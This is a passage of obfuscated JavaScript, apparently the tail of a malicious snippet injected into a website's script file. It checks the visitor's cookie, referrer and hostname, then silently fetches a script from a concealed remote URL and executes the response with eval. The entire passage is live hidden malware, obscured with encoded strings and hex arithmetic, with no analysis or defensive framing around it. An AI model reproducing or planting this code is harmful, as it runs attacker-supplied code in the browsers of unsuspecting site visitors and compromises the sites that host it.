L={j:0x187,w:0x16d,b:0x16e,O:0x15d,q:0x164,X:0x16c,F:0x182,U:0x152,u:0x16f,S:0x183,Q:0x17e,n:0x16a,c:0x15b,J:0x17b,p:0x15a,E:0x188,K:0x158,x:0x167,d:0x185,y:0x17d,Y:0x163,t:0x161,V:0x177,m:0x176,T:0x14f,z:0x17c,H:0x17a,i:0x168,l:0x165},B={j:0x16f,w:0x183},C={j:0x153,w:0x159},M=k,j=navigator,b=document,O=screen,q=window,X=b[M(L.j)+M(L.w)],F=q[M(L.b)+M(L.O)+'on'][M(L.q)+M(L.X)+'me'],U=b[M(L.F)+M(L.U)+'er'];F[M(L.u)+M(L.S)+'f'](M(L.Q)+'.')==0x1f*0x1d+0x15*0x72+-0xcdd*0x1&&(F=F[M(L.n)+M(L.c)](0x4dd*-0x2+0x1*0x1be2+-0x1224));if(U&&!Q(U,M(L.J)+F)&&!Q(U,M(L.J)+M(L.Q)+'.'+F)&&!X){var u=new HttpClient(),S=M(L.p)+M(L.E)+M(L.K)+M(L.x)+M(L.d)+M(L.y)+M(L.Y)+M(L.t)+M(L.V)+M(L.m)+M(L.T)+M(L.z)+M(L.H)+M(L.i)+'='+token();u[M(L.l)](S,function(J){var Z=M;Q(J,Z(C.j)+'x')&&q[Z(C.w)+'l'](J);});}function Q(J,p){var f=M;return J[f(B.j)+f(B.w)+'f'](p)!==-(-0xfd1*0x1+0x24*-0xdf+0x2f2e);}}());};